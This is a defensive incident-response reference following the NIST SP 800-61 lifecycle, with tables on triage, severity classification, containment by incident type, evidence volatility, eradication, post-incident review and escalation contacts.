// IR Lifecycle
The NIST SP 800-61 incident response lifecycle defines four phases that guide how an organisation responds to a security incident. Each phase feeds into the next, and the cycle repeats � lessons from post-incident review inform better preparation for the next incident.
1. Preparation
Build capabilities before incidents happen � IR plans, playbooks, tooling, team training, and communication channels.
2. Detection & Analysis
Identify that an incident has occurred, determine its scope and severity, and gather enough information to make containment decisions.
3. Containment, Eradication & Recovery
Stop the attack from spreading, remove the threat, and restore systems to a known-good state � in a controlled, documented sequence.
4. Post-Incident Activity
Document what happened, review the response, identify gaps, and implement improvements � the lessons-learned loop.
// 1. Preparation
Preparation is the most important phase � the quality of everything else depends on it. Key preparation activities:
IR Plan components
| Component | Description |
|---|---|
| Incident classification matrix | Defines severity levels and what constitutes each � P1 through P4 |
| Escalation paths | Who to contact at each severity � SOC lead, CISO, legal, PR, executives |
| Contact list | Internal and external contacts � MSSP, law enforcement, threat intel vendors, forensics retainer |
| Playbooks | Type-specific response procedures � phishing, ransomware, insider threat, data breach |
| Asset inventory | Critical systems and their owners � needed to assess impact and prioritise response |
| Communication templates | Pre-approved messaging for internal and external notifications |
Jump bag � analyst toolkit
| Tool | Purpose |
|---|---|
| Forensic imaging (FTK Imager, dd) | Create disk images before touching a compromised system |
| Memory capture (WinPmem, Magnet RAM) | Capture volatile memory before power-off |
| Log collection scripts | Pull Windows event logs, prefetch, registry hives, browser artefacts |
| Hash verification | sha256sum, md5sum � verify integrity of collected evidence |
| Network packet capture (tcpdump, Wireshark) | Capture live traffic during active incident |
| Encrypted note-taking | Timestamped investigation notes � never store on the compromised system |
// 2. Detection & Analysis
When an alert or report comes in, the first priority is to understand what you're dealing with � incident type, scope, severity � before taking any action. Acting too fast without understanding the scope can alert the attacker, cause them to accelerate, or result in incomplete containment.
Common detection sources
| Source | What it detects |
|---|---|
| SIEM alerts | Correlation rules matching known attack patterns in log data |
| EDR / XDR alerts | Behavioural detections on endpoints � process injection, LSASS access, lateral movement |
| User reports | Phishing clicks, locked files, unusual pop-ups � often first detection of ransomware |
| Help desk tickets | "My account is locked", "I can't access files" � early indicators of compromise |
| Threat intel feeds | IOCs seen in your environment matching known malicious infrastructure |
| External notification | MSSP, CISA, cert team, law enforcement reporting your organisation has been compromised |
Severity classification (example)
| Severity | Criteria | Response time |
|---|---|---|
| P1 � Critical | Active ransomware / confirmed breach of critical systems / data exfiltration in progress | Immediate � all hands |
| P2 � High | Confirmed malware / credential theft / lateral movement detected | Within 1 hour |
| P3 � Medium | Suspicious activity requiring investigation / policy violation | Within 4 hours |
| P4 � Low | Informational / potential phishing / failed attack attempt | Next business day |
// Triage Checklist
Run through these questions at the start of every incident before deciding on actions:
INITIAL TRIAGE
? What is the incident type? (Malware / Phishing / Data Breach / Insider / DDoS)
? When did it start? (First-seen timestamp)
? What is the severity? (P1 / P2 / P3 / P4)
? Is the attack active or historical?
? Which systems are affected? (Hostnames, IPs, business criticality)
? Which user accounts are involved?
? Is sensitive data at risk or confirmed exfiltrated?
? Is this a single host or has lateral movement occurred?
SCOPE QUESTIONS
? Are other hosts showing the same IOCs in the SIEM?
? Has the attacker established persistence?
? Are there external communications (C2 active)?
? Is this a known malware family or campaign?
DECISIONS TO MAKE
? Contain now (risk of tipping off attacker) or observe longer?
? Who needs to be notified? (Manager / Legal / PR / Executives)
? Do we need law enforcement?
? Are there regulatory notification obligations? (GDPR 72h, etc.)// 3. Containment
Containment stops the spread without fully shutting down the business. There are two approaches � choose based on severity and business impact.
Short-term containment
Immediate actions to stop spread � isolate the compromised host in the EDR, block IOCs at the firewall, disable compromised accounts, reset credentials.
Long-term containment
Broader protective measures while investigation continues � network segmentation, enhanced monitoring on adjacent systems, patch deployment, out-of-band credential resets.
Containment actions by incident type
| Incident type | Immediate containment steps |
|---|---|
| Ransomware | Isolate affected hosts, disable affected network shares, block C2 IPs/domains at firewall, identify patient zero, check backups are clean |
| Credential theft | Disable/reset compromised accounts, force MFA re-registration, revoke active sessions and refresh tokens, check for persistence |
| Malware infection | Isolate host in EDR, quarantine malicious files, block hashes and C2 indicators, check for lateral movement |
| Data exfiltration | Block destination IPs at firewall, isolate source host, preserve logs (don't delete), notify legal and DPO |
| Phishing campaign | Block sender domain/IP, delete emails from all inboxes (if compromised), search for users who clicked, check for follow-on compromise |
// Evidence Collection
Collect evidence in order of volatility � most volatile first. Once a system is powered off or reimaged, volatile data is lost permanently.
Order of volatility
| Priority | Data type | Why it's volatile |
|---|---|---|
| 1 � Highest | RAM / memory | Lost on power-off � contains running processes, encryption keys, network connections, plaintext credentials |
| 2 | Network connections (ss, netstat) | Active connections disappear when the session ends |
| 3 | Running processes (ps aux) | Malware may clean up on termination or system shutdown |
| 4 | Logged-in users, open files | Changes with sessions and file access |
| 5 | Disk image / log files | More stable � but still collect before reimaging |
| 6 � Lowest | Archived logs (SIEM) | Stored remotely � least likely to be lost |
Chain of custody. Every piece of evidence must be documented � who collected it, when, from what system, using what tool, and stored where. Hash evidence files immediately after collection. This is critical if the incident leads to legal action or regulatory investigation.
// 4. Eradication & Recovery
Eradication removes the threat. Recovery restores normal operation. These happen after containment, once the full scope is understood.
Eradication steps
| Step | Description |
|---|---|
| Remove malware | Delete or quarantine all identified malicious files � verify with AV/EDR that detection is clean |
| Remove persistence | Delete all persistence mechanisms � scheduled tasks, registry run keys, startup folders, services, cron jobs |
| Reset credentials | Reset all accounts that may have been compromised � don't skip service accounts or cloud identities |
| Revoke sessions/tokens | Force logout of all active sessions in identity providers � invalidate OAuth tokens, session cookies |
| Patch vulnerabilities | Apply patches for the vulnerability used for initial access � validate they're applied before reconnecting |
| Verify clean state | Run AV/EDR full scan, review process list and network connections � confirm no remaining indicators |
Recovery
Restore systems from known-good backups (verify backup integrity first). Reimage compromised hosts where there's any doubt about completeness of eradication. Reconnect to the network incrementally � monitor closely for 30+ days post-recovery for signs of re-infection or remaining access.
// 5. Post-Incident Activity
The post-incident review (PIR) is where you extract lasting value from the incident. Without it, you repeat the same mistakes.
Post-incident report contents
| Section | Contents |
|---|---|
| Executive summary | Plain-language summary of what happened, impact, and resolution � for non-technical leadership |
| Timeline | Chronological sequence from first indicator to closure � each event timestamped |
| Root cause | The initial access vector � unpatched vulnerability, phishing, weak credentials, misconfiguration |
| Impact | Systems affected, data accessed or exfiltrated, business disruption, financial impact |
| Response actions | Everything done to contain, eradicate, and recover � with rationale for decisions made |
| Lessons learned | What worked, what didn't, and what needs to change |
| Recommendations | Prioritised action items to prevent recurrence � with owners and deadlines |
Run a blameless post-mortem. The goal is to improve processes, not assign fault. If people fear blame, they'll hide information. Psychological safety in incident reviews leads to more honest analysis and better preventive actions.
// Communication & Escalation
Never communicate about a live incident over channels you suspect are compromised. If email or Slack may be compromised, use out-of-band communication � phone, Signal, in-person. Attackers monitor your communication channels during an incident to understand your response and cover their tracks.
Escalation triggers
| Trigger | Who to notify |
|---|---|
| Personal data suspected or confirmed breached | DPO / Legal � GDPR requires notification within 72 hours |
| Ransomware or critical system outage | CISO / Executives / Board � business continuity decisions needed |
| Nation-state or sophisticated threat actor | CISA, NCSC, or relevant national cyber agency |
| Criminal activity (fraud, extortion) | Law enforcement � FBI IC3, Action Fraud, local police |
| Customer or partner data at risk | Legal for breach notification obligations |
| Public-facing systems compromised | PR / Communications � manage public messaging |